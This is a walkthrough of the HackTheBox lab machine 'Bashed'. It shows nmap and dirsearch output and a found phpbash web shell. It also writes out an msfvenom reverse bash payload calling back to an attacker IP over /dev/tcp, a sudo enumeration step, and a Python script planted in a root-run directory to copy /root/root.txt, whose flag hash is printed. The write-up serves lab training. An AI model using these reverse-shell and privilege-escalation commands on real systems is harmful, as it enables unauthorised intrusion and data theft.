HackTheBox - Bashed Walkthrough
Introduction
- see @beepboopdesign for graphics*
One of my first hackthebox walkthroughs' I'll cover overviews a rather simple yet unstable box: Bashed. Occasionally, the box name provides a hint to the flaw, or otherwise what direction to follow. In this case, Bashed appears to - but not confirmed - CVE-2014-6271 aka Shellshock. As I do in other walkthroughs, I'll cover enumeration, exploitation, root, and occasionally closing thoughts. There may be other solutions to the box, which I may miss.
Table of contents
Enumeration
I've started my initial scans of the boxs' address 10.10.10.68 with nmap. I've scanned all ports, from 1-65535.
Initiating NSE at 10:17
Completed NSE at 10:17, 0.52s elapsed
Initiating NSE at 10:17
Completed NSE at 10:17, 0.00s elapsed
Nmap scan report for 10.10.10.68
Host is up (0.11s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.44 seconds
Raw packets sent: 1717 (75.524KB) | Rcvd: 1019 (40.764KB)
root@kali:~/ctfs/hackthebox#
A simple web server. I dont know any hostnames for the box, so I'll assume that querying the IP shall provide a web page rather than some default web server.
Woohoo, we're in luck! A web page talking about a shell, called phpbash. Hey, its "even developed on this server", so where might that be?
I searched his github for information, however, guessing filesnames didn't appear to work. Afterwards, I ran a directory scan which returned promising results :)
root@kali:~/tools/dirsearch# python3 dirsearch.py -u http://10.10.10.68/ -w /usr
/share/dirb/wordlists/big.txt -e php -f
_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_| )
Extensions: php | Threads: 10 | Wordlist size: 40936
Error Log: /root/tools/dirsearch/logs/errors-18-04-28_10-23-21.log
Target: http://10.10.10.68/
[10:23:43] Starting:
[10:24:01] 403 - 299B - /.htaccess.php
[10:24:02] 403 - 299B - /.htpasswd.php
[10:28:00] 200 - 0B - /config.php
[10:28:12] 200 - 2KB - /css/
[10:28:27] 200 - 1KB - /dev/
[10:29:18] 200 - 2KB - /fonts/
[10:30:03] 403 - 292B - /icons/
[10:30:06] 200 - 2KB - /images/
[10:30:31] 200 - 3KB - /js/
[10:32:12] 200 - 939B - /php/
[10:33:20] 403 - 300B - /server-status/
[10:34:32] 200 - 14B - /uploads/
Task Completed
The rest look standard, so I'll skip those and look to /dev/, which appears out of place. Maybe it contains development version of phpbash?
Success on http://10.10.10.68/dev/phpbash.php!
We have command execution, so why not drop a more proper shell. I'll generate one with msfvenom.
oot@kali:~/tools/dirsearch# ip addr show tun3
Device "tun3" does not exist.
root@kali:~/tools/dirsearch# ip addr show tun2
5: tun2: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 100
link/none
inet 10.10.14.242/23 brd 10.10.15.255 scope global tun2
valid_lft forever preferred_lft forever
inet6 dead:beef:2::10f0/64 scope global
valid_lft forever preferred_lft forever
inet6 fe80::a03f:4fc2:5ab2:7682/64 scope link stable-privacy
valid_lft forever preferred_lft forever
root@kali:~/tools/dirsearch# msfvenom -p cmd/unix/reverse_bash LHOST=10.10.14.242 LPORT=7777 -f raw
No platform was selected, choosing Msf::Module::Platform::Unix from the payload
No Arch selected, selecting Arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 66 bytes
0<&103-;exec 103<>/dev/tcp/10.10.14.242/7777;sh <&103 >&103 2>&103
root@kali:~/tools/dirsearch# ncat -vlp 7777
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777
Ncat: Connection from 10.10.10.68.
Ncat: Connection from 10.10.10.68:41664.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
I'll spawn a fake TTY with python -c 'import pty; pty.spawn("/bin/bash")' and enumerate further from there.
Escalation
One of the first things to check for on box is the sudo policy. Maybe you can run arbitrary scripts as root without a password? To do so, run sudo -ln.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@bashed:/var/www/html/dev$ sudo -ln
sudo -ln
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
www-data@bashed:/var/www/html/dev$
A script manager! the permissions NOPASSWD:ALL inform us we do not need a password to complete the sudo command, and I have full permissions to run as root.
However, after trying for the past few hours, I was unable to complete the action. Maybe something is missing, I'm not entirely sure. I saw directory however on root / called /scripts/. Checking in there, an arbitrary script. How does this come in play?
I checked process with a ps -ef | grep scripts and saw this entry
www-data@bashed:/$ ps -ef | grep scripts
ps -ef | grep scripts
root 916 877 0 07:28 pts/0 00:00:00 sudo -u scriptmanager vi /scripts/qwerty.py
scriptm+ 917 916 0 07:28 pts/0 00:00:00 vi /scripts/qwerty.py
www-data 1585 1393 0 07:41 ? 00:00:00 sh -c cd /scripts; python -c "import pty; pty.spawn('/bin/bash')" 2>&1
www-data 1628 1612 0 07:42 ? 00:00:00 sh -c cd /scripts; python -c "import pty; pty.spawn('/bin/bash')" 2>&1
www-data 2425 1935 0 07:51 pts/18 00:00:00 grep scripts
www-data@bashed:/$
From this, we can gather that there are scripts running as root in /scripts/. Any script placed within the directory with the extension *.py will run as root!.
With this in mind, I wrote a simple OS execution to pop a shell, and achieve 'root'.
www-data@bashed:/scripts$ echo 'import os; os.system("cat /root/root.txt > /dev/
shm/.test.txt")' > test.py
www-data@bashed:/scripts$ cat test.py
import os; os.system("cat /root/root.txt > /dev/shm/.test.txt")
www-data@bashed:/scripts$ ls -lat
total 60
-rwxrwxrwx 1 scriptmanager scriptmanager 64 Apr 28 08:37 test.py
-rw-r--r-- 1 scriptmanager scriptmanager 12288 Apr 28 08:36 .test.py.swp
drwxrwxrwx 2 scriptmanager scriptmanager 4096 Apr 28 08:36 .
-rw-r--r-- 1 scriptmanager scriptmanager 217 Apr 28 08:36 t2.py
-rw-r--r-- 1 scriptmanager scriptmanager 223 Apr 28 08:35 bla.py
-rw-r--r-- 1 scriptmanager scriptmanager 216 Apr 28 08:21 omkv.py
-rw------- 1 www-data www-data 12288 Apr 28 07:42 .test.py.swo
-rw------- 1 scriptmanager scriptmanager 12288 Apr 28 07:29 .qwerty.py.swp
drwxr-xr-x 23 root root 4096 Dec 4 13:02 ..
www-data@bashed:/scripts$ cat test.py
import os; os.system("cat /root/root.txt > /dev/shm/.test.txt")
www-data@bashed:/scripts$ cd /dev/shm/
www-data@bashed:/dev/shm$ ls
www-data@bashed:/dev/shm$ ls -alt
total 0
drwxr-xr-x 19 root root 4240 Apr 28 07:26 ..
drwxrwxrwt 2 root root 40 Apr 28 07:26 .
www-data@bashed:/dev/shm$ ls -lat
total 4
-rw-r--r-- 1 root root 33 Apr 28 08:39 .test.txt
drwxrwxrwt 2 root root 60 Apr 28 08:38 .
drwxr-xr-x 19 root root 4240 Apr 28 07:26 ..
www-data@bashed:/dev/shm$ cat .test.txt
cc4f0afe3a1026d402ba10329674a8e2
www-data@bashed:/dev/shm$
Thoughts
After completing the box, I did learn my assumption of Shellshock was incorrect. Instead, this was applicable to an older box, called Shocker. You can hopefully deduce the dangers on sudo policies as well, as we were able to run arbitrary queries as another user. This was a very simple box and I hope to provide a more detailed write up in the future on other boxes.